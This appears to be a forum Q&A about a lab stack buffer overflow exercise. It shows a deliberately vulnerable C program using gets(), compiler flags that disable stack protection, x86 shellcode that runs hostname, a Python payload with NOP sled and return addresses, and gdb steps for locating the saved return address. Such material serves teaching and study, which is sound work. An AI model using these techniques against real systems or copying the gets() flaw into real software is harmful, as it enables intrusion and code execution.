
Unable to run stack buffer overflow exploit

I have to inject code into the following buffer overflow program. The code should display the hostname. I have an opcode (\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80) that works. I have used NOPs and repeated return addresses. But I cannot get it to run the code, and I always get a segmentation fault. Can anyone help me with this?

vulnerable.c

#include <stdio.h>
#include <stdlib.h>

/* Forward declaration: main() calls vulnerable() before it is defined,
   and modern compilers reject implicit function declarations. */
void vulnerable(void);

int
main(int argc, char **argv)
{
  (void)argc;
  (void)argv;
  vulnerable();
  return 0;
}

void
vulnerable(void)
{
  char buf[100];
  printf("enter your name: ");
  fflush(stdout);
  /* gets() does no bounds checking, so input longer than 100 bytes overruns
     buf and overwrites the saved return address. This is the overflow the
     question is about, so it is left in. gets() was removed in C11; if your
     libc no longer declares it, compile with -std=gnu99. */
  gets(buf);
  printf("\"%s\"\n Welcome", buf);
}

I compiled the program above with

gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Shellcode.py

print "\x90"*51 +"\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x0b\x50\xcd\x80" + "\xd8\xf3\xff\xbf"*6

I invoked the Python program from the command line as follows

python shellcode.py | ./vulnerable

I suggest you enable core dumps:

ulimit -c unlimited

Then do a simple buffer overflow, such as perl -e 'print "A"x130', and the system will generate a dump: open it with gdb -c core and you will see %eip = 0x41414141.

Then you can shrink the injected buffer, e.g. perl -e 'print "A"x120', until you find the exact buffer size that overwrites RET.

Could you describe the steps for finding the return address?

c> shellcode.py >shellcode
c> gdb vulnerable
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) b vulnerable
Breakpoint 1 at 0x80484e6: file vulnerable.c, line 17.
(gdb) r <shellcode
Starting program: /home/armali/bin/so/c/vulnerable <shellcode

Breakpoint 1, vulnerable () at vulnerable.c:17
17        printf("enter your name: ");
(gdb) info frame
Stack level 0, frame at 0xbffff7bc:
 eip = 0x80484e6 in vulnerable (vulnerable.c:17); saved eip 0x80484c9
 called by frame at 0xbffff7cc
 source language c.
 Arglist at 0xbffff7bc, args: 
 Locals at 0xbffff7bc, Previous frame's sp is 0x0
 Saved registers:
  ebp at 0xbffff7bc, eip at 0xbffff7c0

The example shows the return address, eip 0x80484c9, saved at 0xbffff7c0.
